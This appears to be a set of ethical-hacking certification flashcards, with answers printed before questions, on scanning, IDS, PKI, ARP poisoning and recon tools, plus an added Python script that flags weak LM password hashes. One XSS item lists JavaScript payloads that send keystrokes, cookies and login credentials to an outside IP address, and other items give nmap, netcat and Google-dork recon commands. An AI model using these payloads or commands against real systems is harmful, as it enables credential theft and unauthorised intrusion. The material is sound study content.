You have been hired as an ethical hacker by a company. During your initial meeting, you are given several guidelines that must be complied with by the company's security, including HIPAA. Which type of company has MOST likely hired you? A)Medical B)Government C)Financial D)Publicly traded

C)Star

You have been hired as an ethical hacker by a small company. The company's network uses UTP cable that connects 45 devices to a central switch. Which type of network topology is implemented? A)Bus B)Ring C)Star D)Mesh

D)Collecting system information

You have been hired as an ethical hacker by your company. You are currently involved in footprinting from outside your company's network. During the most recent analysis, you obtain SNMP information, user, computer and group names and user passwords. Which footprinting objective are you completing? A)Collecting network information B)Collecting organizational information C)Collecting security information D)Collecting system information

A)End-user security training

You have conducted a technical assessment of the network by attempting a number of different social engineering attacks on the network. Which of the following processes is MOST LIKELY to be altered as a result? A)End-user security training B)Physical security C)Password policies D)Access control management

A)Man-in-the-middle attacks

You have decided to implement both client and server PKI certificates to be used by all systems when authenticating to the corporate web site. What type of attack can this help prevent? A)Man-in-the-middle attacks B)Rogue access points C)Smurf attacks D)SYN floods

B)The attacker captured information from a legitimate session and used the session ID from the legitimate session to connect to a computer on your network.

You have recently discovered that an attacker has successfully carried out a session sniffing attack. Which description best describes this attack? A)The attacker masqueraded as a trusted host by using an IP address from within the network being attacked. B)The attacker captured information from a legitimate session and used the session ID from the legitimate session to connect to a computer on your network. C)The attacker inserted malicious coding into a link that appeared to be from a trustworthy source. D)The attacker added SQL code to a Web form input box to gain access to resources or make changes to data.

D)Firewall evasion

You have recently discovered that an attacker used the tcp-over-dns tool on your company's network. What is this tool meant to accomplish in an attack? A)Packet sniffing B)Port scanning C)Vulnerability scanning D)Firewall evasion

D) DES

You have successfully captured a LAN Manager (LM) SAM file from an older Windows machine. Which encryption algorithm is used by LAN Manager on Windows 2000 SAM file entries? A) MD5 B) MD4 C) SSL D) DES

B) If the right side of the hash ends with 1404EE, the password is less than eight characters

You have successfully copied the LM hash values of passwords on the machine. Which of the following is a true statement? A) If the left side of the hash begins with 1404EE, the password is less than eight characters B) If the right side of the hash ends with 1404EE, the password is less than eight characters C) There is no way to tell whether passwords are less than eight characters, you can't reverse hashes D) There is no way to tell whether passwords are less than eight characters; each hash is always 32 long
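This card, the earlier one on hashes ending in 1404EE, and the BIOS checksum card all rest on one property of LM: the password is split into two 7-character halves, each DES-encrypts a fixed constant, and an empty half always produces AAD3B435B51404EE. The following is an added Python example, not from the original flashcards, that applies that check to pwdump-style lines. The sample dump is constructed; the LM values are the illustrative checksums from the BIOS card and the NT column is the well-known hash of the empty string used as filler. One caveat the check must carry: a hash that is AAD3B435B51404EE in both halves is what you also see when LM hash storage has been disabled, so it is not proof of an empty password.

```python
EMPTY_LM_HALF = "AAD3B435B51404EE"   # LM-DES of the constant under an all-zero 7-byte half
HEX_DIGITS = set("0123456789ABCDEF")


def normalise_lm(lm_hash):
    """Accept bare or 0x-prefixed hex; return 32 upper-case hex digits or raise ValueError."""
    h = lm_hash.strip()
    if h[:2].lower() == "0x":
        h = h[2:]
    h = h.upper()
    if len(h) != 32 or set(h) - HEX_DIGITS:
        raise ValueError(f"not a 32-hex-digit LM hash: {lm_hash!r}")
    return h


def classify_lm_hash(lm_hash):
    """What the two 16-hex-digit halves reveal about the password length."""
    h = normalise_lm(lm_hash)
    first, second = h[:16], h[16:]
    if first == EMPTY_LM_HALF and second == EMPTY_LM_HALF:
        # empty password, or LM storage disabled (NoLMHash): cannot tell which from the hash
        return "empty-or-no-lm"
    if second == EMPTY_LM_HALF:
        return "under-8-chars"     # second half empty: 1 to 7 characters, the weak case
    return "8-14-chars"


def parse_pwdump(lines):
    """pwdump-style 'user:rid:lmhash:nthash:::' lines -> list of (user, lm, nt)."""
    records = []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        records.append((parts[0], parts[2], parts[3]))
    return records


def weak_lm_accounts(lines):
    """Users whose LM hash shows a password shorter than eight characters."""
    return [user for user, lm, _nt in parse_pwdump(lines)
            if classify_lm_hash(lm) == "under-8-chars"]


# Constructed sample dump (illustrative hashes, not real credentials)
SAMPLE_PWDUMP = [
    "svc_backup:1001:0182bd0bd4444bf836077a718ccdf409:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "jsmith:1002:0182bd0bd4444bf8aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
]

if __name__ == "__main__":
    for user, lm, _ in parse_pwdump(SAMPLE_PWDUMP):
        print(f"{user:12} {classify_lm_hash(lm)}")
    print("weak:", weak_lm_accounts(SAMPLE_PWDUMP))
```

Of the four BIOS checksums in the earlier card, only 0x0182bd0bd4444bf836077a718ccdf409 has a non-empty second half, which is why it is the most secure of the set; the other three were generated from passwords of seven characters or fewer.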

B. ARP poisoning to allow you to see messages from Host A to Host B

You have successfully tapped into a network subnet of your target organization. You begin an attack by learning all significant MAC addresses on the subnet. After some time, you decide to intercept messages between two hosts. You begin by sending broadcast messages to Host A showing your MAC address as belonging to Host B. Simultaneously, you send messages to Host B showing your MAC address as belonging to Host A. What is being accomplished here? A. ARP poisoning to allow you to see all messages from either host without interrupting their communications process B. ARP poisoning to allow you to see messages from Host A to Host B C. ARP poisoning to allow you to see messages from Host B to Host A D. ARP poisoning to allow you to see messages from Host A destined to any address E. ARP poisoning to allow you to see messages from Host B destined to any address.

B)File and folder encryption

You manage a network that contains Windows Server 2008 and Windows Vista computers. You have several laptops that are issued to employees when they are working remotely. You decide to implement EFS on the laptop computers. What does this provide? A)Automatic error recovery B)File and folder encryption C)Drive encryption D)File-level security

B)Polymorphic virus

Your company has deployed a signature-based anti-virus application on all of its computers. You are concerned that there will be new viruses created that the application cannot detect. Which of the following virus types is most likely to evade detection by the anti-virus application? A)Stealth virus B)Polymorphic virus C)Fast-infecting virus D)Tunneling virus

D)The TTL value is 1, and the destination host is several hops away.

You routinely test network connectivity using the ping command. Recently, you noticed that a router discarded an ICMP packet and sent a time exceeded message to the source host. Which of the following conditions would cause this to occur? A)The TTL value is 2, and the source host is one hop away. B)The TTL value is 2, and the destination host is one hop away. C)The TTL value is 1, and the source host is several hops away. D)The TTL value is 1, and the destination host is several hops away.

B)Enumeration of the alive systems in the first ten IP addresses in the 192.168.1.0 network via ICMP

You run the following command on a Windows computer: FOR /L %H IN (1 1 10) DO ping -n 1 192.168.1.%H | FIND /I "reply" What is the result? A)Enumeration of the alive systems in the last ten IP addresses in the 192.168.1.0 network via ICMP B)Enumeration of the alive systems in the first ten IP addresses in the 192.168.1.0 network via ICMP C)Enumeration of all the dead systems in the 192.168.1.0 network via ICMP D)Enumeration of all the alive systems in the 192.168.1.0 network via ICMP

B) TCPflow

You want to extract the Application Layer data from TCP connections in a log file into separate files. Of the following, which is the best tool to accomplish this task? A) TCPdump B) TCPflow C) Snort D) NMAP

C. nmap -sP 192.168.1.0/24

You want to perform a ping sweep of a subnet within your target organization. Which of the following nmap command lines is your best option? A. nmap 192.168.1.0/24 B. nmap -sT 192.168.1.0/24 C. nmap -sP 192.168.1.0/24 D. nmap -P0 192.168.1.0/24

A. Telnet 168.15.22.4 80 C. nc -v -n 168.15.22.4 80

You want to perform banner grabbing against a machine (168.15.22.4) you suspect as being a web server. Assuming you have the correct tools installed, which of the following command-line entries will successfully perform a banner grab? (Choose all that apply.) A. Telnet 168.15.22.4 80 B. Telnet 80 168.15.22.4 C. nc -v -n 168.15.22.4 80 D. nc -v -n 80 168.15.22.4

C. nmap -sS targetIPaddress

You want to run a scan against a target network. You're concerned about it being a reliable scan, with legitimate results, but want to take steps to ensure it is as stealthy as possible. Which scan type is best in this situation? A. nmap -sN targetIPaddress B. nmap -sO targetIPaddress C. nmap -sS targetIPaddress D. nmap -sT targetIPaddress

C)PPTP

You would like to encrypt a VPN connection at the Data Link layer of the OSI model. Which protocol should you choose? A)GRE B)IPSec C)PPTP D)L2TP

B. Closed

You're running an IDLE scan and send the first packet to the target machine. Next, the SYN/ACK packet is sent to the zombie. The IPID on the return packet from the zombie is 36754. If the starting IPID was 36753, in what state is the port on the target machine? A. Open B. Closed C. Unknown D. None of the above.

E. Anomaly based

Your IDS sits on the network perimeter and has been analyzing traffic for a couple of weeks. On arrival one morning, you find the IDS has alerted on a spike in network traffic late the previous evening. Which type of IDS are you using? A. Stateful B. Snort C. Passive D. Signature based E. Anomaly based

D)Limit interactive logon privileges

Your IT security team defends against privilege escalation with the following countermeasures: -Encryption for sensitive company data -Services run as unprivileged accounts -Multi-factor authentication and authorization Which additional countermeasure would BEST enhance the current defense? A)Patch critical systems regularly B)Implement privilege separation for custom programs C)Perform debugging during stress tests D)Limit interactive logon privileges

D) Cygwin

Your client has some Unix tools he wants to run on a Windows machine. A friend suggests a well-known Unix subsystem that can run on Windows for just such a purpose. What is this subsystem called? A) Armitage B) Metasploit C) LILO D) Cygwin

A. Information Security Policy

Your company has a document that spells out exactly what employees are allowed to do on their computer systems. It also defines what is prohibited and what consequences await those who break the rules. A copy of this document is signed by all employees prior to their network access. Which of the following best describes this policy? A. Information Security Policy B. Special Access Policy C. Information Audit Policy D. Network Connection Policy

C)Nessus

Your company has a monthly requirement to test corporate compliance with host application usage and security policies. You need to use the appropriate tool to fulfill this requirement. Which tool should you use? A)Wireshark B)Nmap C)Nessus D)Snort

A)ADS Spy B)streams.exe E)SFind

Your company has a policy that alternate data streams (ADSs) should be monitored to verify that they do not contain malicious content. Which of the following tools will help you locate ADSs? (Choose all that apply.) A)ADS Spy B)streams.exe C)AdsCheck.exe D)ADMutate E)SFind

B)RA

Your company has a public key infrastructure (PKI) implemented to issue digital certificates to users. Users start reporting problems with receiving new certificates. You suspect that the entity responsible for receiving the subject's request and verifying the subject's identity is down. Which entity should you check? A)VA B)RA C)OCSP D)CA

C)Detect and analyze

Your company has completed all the appropriate steps to prepare for a potential incident. The next day, a user informs you that the internal Web server is unavailable. When you research the issue, you determine that a Distributed Denial of Service (DDoS) attack has been carried out against the internal Web server. You need to follow the appropriate incident response procedures to recover the internal Web server. What is the first step to perform when an incident has occurred? A)Classify and prioritize B)Notify C)Detect and analyze D)Contain

C)White hat

Your company has decided to hire an ethical hacker to help identify issues with your company's network. Which of the following terms can also be used to describe this position? A)Gray hat B)Black hat C)White hat D)Script kiddie

Windows Task Scheduler

___ along with utilities such as 'at' and 'schtasks' can be used to schedule programs that can be executed at a specific date and time

B)External, host-based vulnerability scan

Your company has hired a third party to identify vulnerabilities on the network. Recently, one of the contractors performed a vulnerability scan over the Internet that identified the vulnerabilities on the internal Web server. Which type of vulnerability scan occurred? A)Internal, host-based vulnerability scan B)External, host-based vulnerability scan C)External, application vulnerability scan D)Internal, application vulnerability scan

B)Snort

Your company has hired an ethical hacker to assess your company's network security. He will need to perform packet sniffing and logging, in addition to detecting any network intrusions. Which tool will he most likely use? A)TCPDump B)Snort C)AirSnort D)Wireshark

A)ESXi C)Hyper-V

Your company has implemented a virtualization solution to isolate software environments and establish access levels for internal employees. Which of the following software is vulnerable to a VM-level attack? (Choose all that apply.) A)ESXi B)Cygwin C)Hyper-V D)XCode E)Wine

D)It will track changes to the files on the server.

Your company has just installed a new Linux file server. You decide to install Tripwire to provide system integrity verification on the file server. Which function will this provide? A)It will provide security checks, including file permissions. B)It will test the system for vulnerabilities. C)It will recover encryption keys. D)It will track changes to the files on the server.

A)HR department

Your company has recently adopted several new security policies. Most of the policies just affect the employees in the IT department. However, one of the policies affects employees in the accounting department. Which entity is responsible for making the employees aware of the new security policies? A)HR department B)IT department C)Departmental managers D)Chief security officer

D)AirSnort

Your company has recently launched several wireless networks at its primary location. Contrary to your suggestions, all the wireless networks use WEP encryption keys. You are concerned that hackers will easily obtain the WEP encryption key. Which tool should you use to demonstrate this vulnerability? A)Netstumbler B)Wireshark C)Nessus D)AirSnort

B)802.1x EAP packets are captured for later replay.

Your company has several wireless networks implemented on its large campus. 802.1x authentication is deployed for all wireless networks through a RADIUS server. Recently, you discovered that one of the wireless networks was the victim of an Extensible AP Replay attack. What occurs during this attack? A)A valid 802.1x EAP exchange is observed so that the attacker can later send a forged EAP-Failure message. B)802.1x EAP packets are captured for later replay. C)User credentials are recovered from captured 802.1x LEAP packets using a dictionary attack tool. D)User identities are captured from cleartext 802.1x Identity Response packets.

Signature-based NIDS

Your company implements two Network Intrusion Detection Systems (NIDS): one anomaly-based and one signature-based. It also implements two Network Intrusion Protection Systems (NIPS): one anomaly-based and one stateful protocol-based. Your company employs an ethical hacker who uses ADMutate to disguise a buffer overflow attack. The attack is attempting to breach the network. Which system is most likely being targeted? A)Signature-based NIDS B)Stateful protocol-based NIPS C)Anomaly-based NIPS D)Anomaly-based NIDS

B)Stateful inspection firewall

Your company needs to implement a firewall. It must be able to discard TCP segments arriving at an open port when they have the header flag of FIN enabled, provided they are the first packet received from the source. Which type of firewall should be implemented? A)Packet filter firewall B)Stateful inspection firewall C)Circuit level firewall D)Web application firewall

C)document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key); };

Your company provides a user feedback form that includes a comment field. Currently, comment data is received using a <textarea> element without any front-end or back-end validation. Which of the following JavaScript code would be an example of an attempted XSS KeyLogger attack? A)window.setInterval(function() { new Image().src = 'http://5.45.64.15/index.php?' + Math.floor(Math.random() * 1000) + '=data'; }, 10); B)window.onload = function() { window.location = 'http://5.45.64.15/index.php?data=' + document.cookie; }; C)document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key); }; D)document.forms[0].onsubmit = function() { Window.location = 'http://5.45.64.15/index.php?data=' document.forms[0].username.value + '/' + document.forms[0].password.value; };

B)Password, smart card, retina scan

Your company wants to implement a three-factor access control system. Which of the following would qualify for this implementation? A)PIN, smart card, hardware token B)Password, smart card, retina scan C)PIN, password, smart card D)Fingerprint scan, smart card, retina scan

C)3DES

Your company wants to use symmetric key cryptography in an application it is developing. Which of the following algorithms could be used? A)Diffie-Hellman B)ElGamal C)3DES D)RSA

D)Hiding file data in existing files

Your company's network consists of primarily Windows client and server computers. Recently, management has become concerned with alternate data streams when using NTFS in Windows. What are alternate data streams in Windows? A)Data concealed within another file, message, image, or video B)Automatic file-level encryption C)Optional hard disk-level encryption D)Hiding file data in existing files

C)Go to archive.org

Your company's web site is updated on a regular basis. Over the past three years, the web site has undergone four major updates in response to security issues. One of those major updates was to address a JavaScript vulnerability that allowed SQL injection attacks to occur. A new developer has requested to go back and see the code for the JavaScript vulnerability. However, he discovers that there is no retention of the code for the previous web site versions. How can the developer go back and review the code? A)Review the logs for the web server B)Go to whois.org C)Go to archive.org D)It is not possible to retrieve the old code

Authentication Authorization Accounting (AAA)

___ confirms the identity of the user or device. ___ determines the privileges (rights) of the user or device. ___ records the access attempts, both successful and unsuccessful.

Plist files

___ in MacOS and OS X describe when programs should execute, executable file path, program parameters, required OS permissions, etc.

A)Rolling, displays repeatedly until the script process is killed

Your manager is testing your understanding of the PHP language. She provides you the following code: <?php for (;;) { print "Rolling,"; } ?> She asks you to describe the output. Which description is correct? A)Rolling, displays repeatedly until the script process is killed B)Rolling, displays once C)"Rolling,"; displays repeatedly until the script host automatically reboots D)"Rolling,"; "Rolling,"; displays every 30 seconds E)"Rolling,"; displays once F)Error message displays G)Rolling,Rolling, displays every 30 milliseconds

D. 0.20

Your network contains certain servers that typically fail once every five years. The total cost of one of these servers is $1000. Server technicians are paid $40 per hour, and a typical replacement requires two hours. Ten employees, earning an average of $20 per hour, rely on these servers, and even one of them going down puts the whole group in a wait state until it's brought back up. Which of the following represents the ARO for a server? A. $296 B. $1480 C. $1000 D. 0.20

C)Snort

Your network has increasingly come under attack. Management has asked you to take measures to detect and prevent future attacks. You need to purchase a tool or device that provides intrusion detection, packet sniffing, and logging. Which tool should you recommend? A)Nmap B)Nessus C)Snort D)Foundstone

C)Denial of service

Your network just suffered an attack. Nothing was stolen or deleted, but a key file server was unresponsive to users for about 8 hours. What kind of attack did you suffer? A)Social engineering B)IP spoofing C)Denial of service D)Brute force

B)It will allow the scan to evade your border sensor

Your organization has contracted with a third party to perform a penetration test. You have been allowed to observe and ask questions as the test proceeds. At one point you see that the tester is performing a scan of the network from the Internet and tunneling the scan through SSH. What is the purpose of this extra step? A)The scan will complete faster B)It will allow the scan to evade your border sensor C)The scan will gather more complete information D)It will scan devices that allow SSH connections

C)Non-repudiation

Your organization has decided to implement IPSec. One of the important functions you want to implement is its ability to prove where a message originates. Which feature of IPsec provides this function? A)Authentication B)Confidentiality C)Non-repudiation D)Integrity

A)Mandatory access control

Your organization has implemented a two-factor authentication system that includes usernames, passwords, and smart cards. Users are assigned classifications, and access to resources is granted based on the resource's security label. Which access control mechanism does this implement? A)Mandatory access control B)Detective access control C)Role-based access control D)Physical access control

D)A sniffer used to capture password hashes

Your organization implements a network protocol that uses SMB signing. Which attack does this protect against? A)A port scanner used to discover open ports B)A network mapper used to discover which OSs are used on the network C)A vulnerability scanner used to discover network vulnerabilities D)A sniffer used to capture password hashes

D)Vulnerability protection system

Your organization is concerned that patches and updates aren't being deployed in a timely manner. You need to deploy a system that will help with this problem. Which type of system should you deploy? A)Intrusion prevention system B)Network access control C)Network address translation D)Vulnerability protection system

B. BIA (Business Impact Analysis)

Your organization is planning for the future and is identifying the systems and processes critical for their continued operation. Which of the following best describes this effort? A. BCP B. BIA C. DRP D. ALE

A)Immediately

Your organization processes credit card payments and adheres to the requirements of the Payment Card Industry Data Security Standard. Recently, you upgraded the card processing software to a new version. When are you required by the PCI-DSS to perform external and internal penetration testing? A)Immediately B)Within the next year C)At the next yearly test D)Within the next 6 months

B)Privilege escalation

Your security team has implemented the following controls: sensitive data is encrypted; interactive logon privileges are restricted; services run as unprivileged accounts; users and applications operate with the least privileges. Which of the following vulnerabilities are these controls designed to mitigate? A)DoS attacks B)Privilege escalation C)Phishing attacks D)Trojan software

A)Digital signature B)Private key

Your software company has recently implemented an IaaS solution with a cloud service provider. Multiple web sites use PKI to provide user account security to your customers. Which component(s) are the responsibility of your company to manage? (Choose all that apply.) A)Digital signature B)Private key C)Public key D)Digital certificate E)Secure web gateway

D. TCP over DNS

Your target subnet is protected by a firewalled DMZ. Reconnaissance shows the external firewall passes some traffic from external to internal, but blocks most communications. HTTP traffic to a web server in the DMZ, which answers to www.somebiz.com, is allowed, along with standard traffic such as DNS queries. Which of the following may provide a method to evade the firewall's protection? A. An ACK scan B. Firewalking C. False positive flooding D. TCP over DNS

D) Fragroute

Your target uses a signature-based IDS. Which of the following allows an attacker to intentionally craft packets that will eventually be correctly assembled by the target, thereby passing through the IDS undetected? A) Defrag B) Tcpfrag C) Netcat D) Fragroute

C. Extract metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file.

Your team is hired to test a business named Matt's Bait 'n Tackle Shop (domain name mattsBTshop.com). A team member runs the following command: metagoofil -d mattsBTshop.com -t doc,docx -l 50 -n 20 -f results.html Which of the following best describes what the team member is attempting to do? A. Extract metadata info from web pages in mattsBTshop.com, outputting results in Microsoft Word format. B. Extract metadata info from the results.html page in mattsBTshop.com, outputting results in Microsoft Word format. C. Extract metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file. D. Uploading results.html as a macro attachment to any Microsoft Word documents found in mattsBTshop.com.

WebSite-Watcher

allows you to automatically check web pages for updates and changes

eMailTrackerPro

analyzes email headers and reveals information such as sender's geographical location, IP address, etc.

The Onion Routing (Tor)

basically works by installing a small client on the machine, which then gets a list of other clients running (this program) from a directory server. The client then bounces Internet requests across random clients to the destination.

PsPasswd

changes account passwords

Social engineers

depend on the fact that people are unaware of their valuable information and are careless about protecting it

1. Know the security posture (footprinting helps make this clear). 2. Reduce the focus area (network range, number of targets, and so on). 3. Identify vulnerabilities. 4. Draw a network map.

describe four main focuses and benefits of footprinting

TCP Connect Scan

detects when a port is open by completing the three-way handshake

PsGetSid

displays the SID of a computer or a user

PsLogList

dump event log records

active footprinting

effort is one that requires the attacker to touch the device, network, or resource

state-sponsored hacker

employed by a government

Colasoft Packet Builder

enables creating custom network packets to audit networks for various attacks

SolarWinds Engineer Toolset's Ping Sweep

enables scanning a range of IP addresses to identify which IP addresses are in use and which ones are currently free. It also performs reverse DNS lookup

PsExec

execute processes remotely

security identifier (SID)

identifies user, group, and computer accounts and follows a specific format.

Vulnerability Scanning

identifies vulnerabilities and weaknesses of a system and network in order to determine how a system can be exploited

VoIP login portals

inurl:8080 intitle:"login" intext:"UserLogin" "English"

Passive Reconnaissance

involves acquiring information without directly interacting with the target.

Passive reconnaissance

involves gathering information about your target without their knowledge.

Active reconnaissance

involves interacting with the target directly by any means

Stealth scan

involves resetting the TCP connection between client and server abruptly, before the three-way handshake completes, leaving the connection half-open

Ping scan

involves sending ICMP ECHO requests to a host. If the host is live, it will return an ICMP ECHO reply

Recon-ng

is a Web Reconnaissance framework with independent modules, database interaction, built-in convenience functions, interactive help, and command completion, that provides an environment in which open-source web-based reconnaissance can be conducted

Enterprise Information Security Architecture (EISA)

is a collection of requirements and processes that help determine how an organization's information systems are built and how they work.

DNS records

provide important information about the location and type of servers

Baselines

provide the minimum security level necessary.

DNS (Domain Naming System)

provides a name-to-IP-address (and vice versa) mapping service, allowing us to type in a name for a resource as opposed to its address.

SNMPv3

provides encryption for the strings as well as other improvements and options.

The Application layer

provides services to applications, which allow them access to the network. Protocols such as FTP and SMTP reside here.

IP spoofing

refers to changing source IP addresses so that the attack appears to come from someone else

Google hacking

refers to creating complex search queries in order to extract sensitive or hidden information

Hacking

refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to the system resources

passive footprinting

refers to measures to collect information from publicly accessible sources

Spam/Email Steganography

refers to the technique of sending secret messages by hiding them in spam/email messages

information warfare (InfoWar)

refers to the use of information and communication technologies (ICT) to gain a competitive advantage over an opponent

ARP (Address Resolution Protocol)

resolves IP addresses to machine (MAC) addresses.

802.11b

runs at up to 11 Mbps at 2.4 GHz

802.11g

runs at up to 54 Mbps at 2.4 GHz

Censys

search engine enables researchers to ask questions about the hosts and networks that compose the Internet

SHODAN

search engine lets you find connected devices (routers, servers, IoT, etc.) using a variety of filters

Scanning and enumeration

security professionals take the information they gathered in recon and actively apply tools and techniques to gather more in-depth information on the targets.

finance.google.com

company news releases on a timeline of the company's stock performance (in effect, showing when key milestones occurred) can be found where?

Masking and Filtering

techniques hide data using a method similar to watermarks on paper; this can be done by modifying the luminance of parts of the image
